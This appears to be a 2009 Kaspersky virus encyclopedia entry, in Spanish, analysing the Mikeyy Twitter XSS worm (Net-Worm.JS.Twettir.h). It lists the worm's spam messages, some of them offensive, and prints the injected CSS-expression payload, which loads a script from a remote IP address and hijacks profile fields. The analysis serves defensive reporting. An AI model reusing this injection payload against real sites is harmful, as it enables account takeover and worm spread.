|
|
|
|
| Enciclopedia de virus |  |
Alertas | |
Análisis | |
Noticias | |
Glosario |
 |
| ||||||
|
| ||||||
|
| ||||||||||
| |||||||
Home / Virus / Enciclopedia de virus
Net-Worm.JS.Twettir.hOtras versiones: .a, .b, .c, .d, .e, .f, .g
Es una variante “enmarañada” (obfuscated) del gusano. Mensajes enviados: "Twitter, this sucks! Fix your coding".
"Twitter Security Team Really? You need to be fired". "Horrible Coding! " "@oprah - sup? welcome to twitter. - mikeyy" "@aplusk - hey, homo. - mikeyy" "@souljaboytellem - your music sucks dude. - mikeyy" "@TheEllenShow - hey baby, love me long time? - mikeyy" "@StephenColbert - you funny. - mikeyy" "@cnnbrk - he's back. ;) - mikeyy" "@nytimes - yep, it's true. - mikeyy" "RT @mashable WARNING: Mikeyy Twitter Worm Returns!! - http://bit.ly/gxwHH" "Twitter, do you know about the before_save model callback? - mikeyy" "This exploit only affects Internet Explorer users. Thanks. - mikeyy" "Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy " "Get Firefox, thanks. www.Firefox.com" "Twitter, you should be paying me now. - mikeyy" Esta variante del gusano modifica el parámetro user[profile_sidebar_border_color] por el siguiente: 000; } #notifications{width:
expression(document.body.appendChild(document.createElement('script')).src='http://74.200.253.195/xss.js') Como resultado, en el perfil del usuario aparece un enlace al script XSS malicioso. Además, el gusano modifica los siguientes parámetros del usuario: user[name] user[url] user[description] user[location] por el valor “Mikeyy”, para mostrar este valor en la página del usuario en los campos Name, Location, Web, Bio. Se envía una llamada POST al URL "/friendships/create/32336151" para aceptar al usuario id 32336151, de sobrenombre followmehah como amigo. | |||||||
Copyright © 1996 - 2009
Kaspersky Lab
Todos los derechos reservados
Correo electrónico: webmaster@viruslist.com
